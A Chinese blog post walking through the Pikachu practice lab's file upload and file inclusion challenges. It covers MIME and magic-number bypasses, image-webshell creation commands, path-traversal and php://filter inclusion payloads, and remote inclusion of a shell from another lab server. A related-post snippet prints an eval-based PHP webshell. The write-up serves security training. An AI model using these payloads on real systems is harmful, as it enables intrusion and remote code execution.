pikachu文件上传和文件包含

最新推荐文章于 2024-06-18 17:47:02 发布
最新推荐文章于 2024-06-18 17:47:02 发布
阅读量572 收藏 2
点赞数
分类专栏: 靶场 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43995159/article/details/128984630
版权

pikachu_文件上传和文件包含

文件上传

1.客户端检查

要求上传图片,此处准备一个php文件上传:

//shell.php
<?php
    phpinfo();
?>

在这里插入图片描述

选完就提示不合规,那么修改后缀,改为phpinfo.jpg

在这里插入图片描述

上传成功,此处为浏览器前端检查

2.MIME类型检查

上传shell.php,显示格式不正确

在这里插入图片描述

可以看出没有进行前端检查,那么可以上传shell.php尝试重放改包

Content-Type改为 image/jpeg

在这里插入图片描述

上传成功

在这里插入图片描述

这里直接修改后缀也能成功

3.getimagesize幻数检查

直接上传或修改类型,会显示后缀错误

在这里插入图片描述

修改后缀名,会显示是假图片

在这里插入图片描述

那么这里应该是对图片的幻数进行了检查

常见的php函数有

getimagesize()获取图片尺寸,失败时返回false,当文件不是图片时,会失败。

exif_imagetype()通过幻数判断图片格式

可以通过图片马绕过

制作图片马

//windows
copy myimg.jpg/b + shell.php/a shell.jpg

//linux方法1
echo '<?php phpinfo; ?>' >> myimg.jpg

//linux方法2
cat shell.php | >> myimg.jpg

其中的/b指用二进制方式读取,/a表示用ascii码读取

在这里插入图片描述

上传成功

此外,还可以通过16进制编辑器给shell.php添加图片幻数来制作

文件包含

1.本地包含

在这里插入图片描述

url中通过get传递了文件名来获取文件,那么直接将参数改为该页面文件名,使用php伪协议php://filter读获取页面php代码

在这里插入图片描述

http://192.168.248.128:81/pikachu/vul/fileinclude/fi_local.php?filename=php://filter/read/convert.base64-encode/resource=fi_local.php

说明伪协议可能用不了

那么再查看页面源代码,发现返回图片的位置为include目录

在这里插入图片描述

此时可以尝试路径穿越到上传文件的目录uploads,使用之前上传的木马。

但这里直接可以看到路径pikachu/vul/fileinclude/include,而上传的路径在上传文件的目录有显示为pikachu/vul/unsafeupload/uploads,那么payload应为

../../unsafeupload/uploads/shell.php

在这里插入图片描述

2.远程包含

在这里插入图片描述

php中include包含远程文件的前提是php.ini中 allow_url_fopen=On (默认开启) 和 allow_url_include=Off (默认关闭)要开启

在这里插入图片描述

修改后保存,重启pikachu

在这里插入图片描述

查看网页源代码,找到页面和图片来源

在这里插入图片描述

可以看到还是本地的,但因为 allow_url_include为开启状态,远程包含是可行的

在另一台服务器中放置木马文件,那么就在pikachu的url里将其包含进来

在这里插入图片描述

http://192.168.248.139/shell.php

在这里插入图片描述

成功执行

来个西瓜
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Pikachu文件上传
dyx0910的博客
05-18 1527
Pikachu文件上传
文件上传下载
04-11
Struts2是一个流行的Java Web框架,它提供了丰富的功能来处理用户交互,包括文件上传和下载。在本篇文章中,我们将深入探讨如何在Struts2框架下实现多文件上传与下载的功能。 首先,我们需要了解Struts2的核心组件...
Pikachu靶场——文件上传漏洞
知世郎
08-21 1574
​ 凡是存在文件上传的地方均有可能存在文件上传漏洞,关于上传文件操作的时候对方代码写的是否完整、是否安全,一旦疏忽了某个地方可能会造成文件上传漏洞。
Pikachu靶场--文件包含
最新发布
qq_65150735的博客
06-18 993
Pikachu靶场--文件包含
pikachu文件上传
qq_62078839的博客
04-03 2550
Client check 打开靶场尝试直接上传一句话木马发现无法上传 正在上传…重新上传取消 又看到此道题目题名为Client check,猜想是在前端对上传文件进行判断,我们直接禁止使用js,再尝试上传文件,发现上传成功 正在上传…重新上传取消 使用phpinfo()来确认木马的可用性 正在上传…重新上传取消 MIME type 正在上传…重新上传取消 这里我们看到标题是MIME type就可以想到通过更改文件content-type来成功上传小马 正在上传…重新上传取消 成功上
pikachu(RCE+文件包含+任意文件下载)
qq_47804678的博客
03-13 618
所以,一些能涉及到命令执行,且其中有可控参数的情况,我们就可以利用这个来构造一下恶意命令,执行来得到我们想要的信息。后续可以利用反弹shell或者请求下载攻击者服务器上的恶意shell脚本再执行。
pikachu靶场通关之文件下载,文件上传文件包含系列
qq_74825121的博客
01-24 2262
文件上传文件包含,文件下载
pikachu靶场包含网络安全中常见的漏洞
11-08
这个靶场涵盖了XSS跨站脚本攻击、SQL注入、目录遍历、文件上传漏洞、文件包含漏洞以及远程执行等多种威胁,通过实践操作,用户可以提高自身的安全防护意识和技能。 1. **XSS(Cross-Site Scripting)跨站脚本攻击**...
Web应用安全:越权下载文件实验.docx
06-18
2. 不安全文件上传和下载机制 3. 不当的输入验证和过滤 防止越权下载漏洞的方法: 1. 正确设置文件权限 2. 使用安全文件上传和下载机制 3. 实施输入验证和过滤 4. 使用安全的编程语言和框架 Web 应用安全是一...
pikachu-master.zip
07-05
1. **Web安全概念**:Pikachu靶场涵盖了多种常见的Web安全漏洞,如SQL注入、XSS跨站脚本、CSRF跨站请求伪造、文件包含、命令注入等,通过对这些靶场的实践,可以深入理解各类漏洞的原理及其防护措施。 2. **PHP编程...
WEB渗透学习-pikachu靶场练习
04-20
pikachu是一个开源靶场,适用于新手学习WEB安全时练习使用,内涵XSS漏洞、sql注入漏洞、SEC漏洞、文件上传(下载)漏洞、文件包含漏洞以及越权漏洞等
PIKACHU文件包含
qq_62078839的博客
04-11 1417
原理 服务器执行PHP文件时,可以通过文件包含函数加载另一个文件中的PHP代码,并且当PHP来执行,这会为开发者节省大量的时间。这意味着您可以创建供所有网页引用的标准页眉或菜单文件。当页眉需要更新时,您只更新一个包含文件就可以了,或者当您向网站添加一张新页面时,仅仅需要修改一下菜单文件(而不是更新所有网页中的链接)。 PHP文件包含函数有以下四种: require() require_once() include() include_once() 本地文件包含 我们再pikachu
文件上传漏洞靶场前十关
zkaqlaoniao的博客
10-21 251
文件名 = 文件名::$DATA的形式: shell.php::$DATA 达到绕过黑名单。但是我构造一个xxx.php. . 你去完末尾点去完空你还剩一个php. 还是能绕过。构造一个shell.pphphp 你检测到php 我还剩一个php。系统会自动去空,但是检测的时候如果没有收尾去空处理,是可以绕过黑名单的。没去点,如果我们写成xxx.php. —->系统会去点,可以绕过检测。这有大小写转换,有去末尾点,有去除::$DATA,有去空。删除末尾的点-去空—-》最后变成shell.php.
pikachu-文件上传+XXE+不安全的url跳转
qq_47804678的博客
03-22 304
们可以看到,刚把文件上传,还没有点击“开始上传”就已将弹出了警示框,没有交互就已经检测了文件的类型,说明他是在前端进行校验的。那么我们看一下代码:选择浏览,可以看到代码中有一个checkfiletxt()的函数:我们尝试看一下这个函数,果然是他,然后把onchange值改为空,将这个函数删除:再次尝试上传php文件,发现成功上传。(但是只要重新刷新页面,代码就会恢复。服务端check尝试上传php文件,点击上传发现禁止上传,提示只能是图片格式:是一种标准化的方式来表示文档的性质和格式。
pikachu——暴力破解、文件上传
qq_66985187的博客
10-24 283
暴力破解 “暴力破解”是一种攻击手段,在web攻击中,一般会使用这种手段对应用系统的认证信息进行获取。 其过程就是使用大量的认证信息在认证接口进行尝试登录,直到得到正确的结果。 为了提高效率,暴力破解一般会使用带有字典的工具来进行自动化操作。 我们说一个web应用系统存在暴力破解漏洞,一般是指该web应用系统没有采用或者采用了比较弱的认证安全策略,导致其被暴力破解的“可能性”变的比较高。这里的认证安全策略, 包括: 是否要求用户设置复杂的密码; 是否每次认证都使用安全的验证码或者手机otp; 是否
文件下载上传——pikachu练习
ptxybird的博客
07-06 504
pikachu文件下载和上传练习
pikachu-文件上传漏洞源码分析及修复
静水流深,沧笙踏歌
09-08 2011
概述 文件上传源码分析 注:client check和MIME type的d.php为 <?php if(md5($_GET["pass"])=="1a1dc91c907325c69271ddf0c944bc72"){@eval($_POST[a]);} ?> getimagesize的php.php为 <?php phpinfo(); ?> client check d...
文件上传文件包含
枫梓林のBlog
05-02 1286
文件上传文件包含 文章目录文件上传文件包含0x01 基于 DVWA 的 low 级别演示文件上传漏洞1.文件上传漏洞简介2.使用蚁剑连接 webshell.php0x02 基于DVWA的Medium级别演示文件上传漏洞1.截取上传文件的 HTTP 请求进行修改提交2.使用蚁剑连接0x03 实战-基于 DVWA 的 High 级别演示文件上传漏洞1.上传测试2.文件包含漏洞3.制作简单的图片木马进行上传绕过3.1 MIME 类型3.2 上传文件3.3 以文件包含漏洞来执行图片中的 php代码0x04 总结
Pikachu 文件包含 ~本地~远程
m0_63152656的博客
09-25 302
Pikachu 文件包含 ~本地~远程 首先了解一下include()函数的作用: 语句包含并运行指定文件,也就是说如果前端传给后端的代码没有进行过滤或者判断,就会被执行
pikachu文件上传及文件漏洞
05-12
Pikachu 文件上传漏洞是指攻击者通过在 Web 应用程序中上传恶意文件,从而在服务器上执行任意代码的漏洞。攻击者可以通过此漏洞上传包含恶意代码的文件,并将其重命名为可执行文件,从而在服务器上执行任意代码,例如获取敏感信息、篡改数据等。 防范文件上传漏洞的方法包括: 1. 对用户上传的文件进行白名单校验,只允许上传指定类型的文件; 2. 对上传文件的大小进行限制; 3. 对上传文件进行杀毒检测,防止上传含有病毒的文件; 4. 对上传的文件进行隔离存储,避免恶意文件对其他文件造成影响; 5. 对上传文件的名称进行过滤,禁止包含特殊字符或系统关键字等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值